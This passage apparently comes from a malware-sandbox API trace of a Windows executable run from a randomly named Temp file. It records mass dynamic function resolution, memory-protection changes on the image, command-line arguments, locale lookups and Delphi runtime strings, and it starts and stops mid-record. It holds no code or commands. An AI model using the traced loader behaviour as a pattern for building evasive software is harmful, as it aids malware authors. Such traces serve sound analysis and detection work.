"c:\\windows\\system32\\rasadhlp.dll") Region: id = 1046 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 8 os_tid = 0xae8 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.723] GetProcAddress (hModule=0x76910000, 
lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0093.724] GetProcAddress 
(hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0093.725] 
GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0093.726] GetProcAddress (hModule=0x76910000, 
lpProcName="GetCurrentProcess") returned 0x7695cdcf [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0093.727] 
GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0093.728] GetProcAddress (hModule=0x76910000, 
lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 
[0093.729] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.729] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.730] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.730] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.730] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.730] 
LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0093.731] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0093.731] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0093.731] GetProcAddress (hModule=0x76750000, 
lpProcName="CoCreateInstance") returned 0x76799d0b [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0093.731] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0093.731] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.731] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.732] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0093.732] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0093.732] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0093.732] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0093.732] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.732] 
GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.732] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0093.732] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0093.732] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0093.733] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0093.733] SetThreadLocale (Locale=0x400) returned 1 [0093.733] GetVersion () returned 0x1db10106 [0093.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.733] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0093.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.733] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0093.733] GetModuleHandleW 
(lpModuleName="kernel32.dll") returned 0x76910000 [0093.733] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0093.733] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.734] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.734] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0093.734] GetACP () returned 0x4e4 [0093.734] GetCurrentThreadId () returned 0xae8 [0093.734] GetVersion () returned 0x1db10106 [0093.734] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x261cb0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.734] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.734] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.734] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x13c0000 [0093.734] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.735] GetUserDefaultUILanguage () returned 0x409 [0093.736] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0093.736] GetThreadUILanguage () returned 0x120409 [0093.736] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0093.736] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14ea680, pcchLanguagesBuffer=0x12d768 | out: 
pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14ea680, pcchLanguagesBuffer=0x12d768) returned 1 [0093.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.736] GetUserDefaultUILanguage () returned 0x409 [0093.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0093.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.737] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc0, 
lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0093.737] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0093.737] LoadStringW 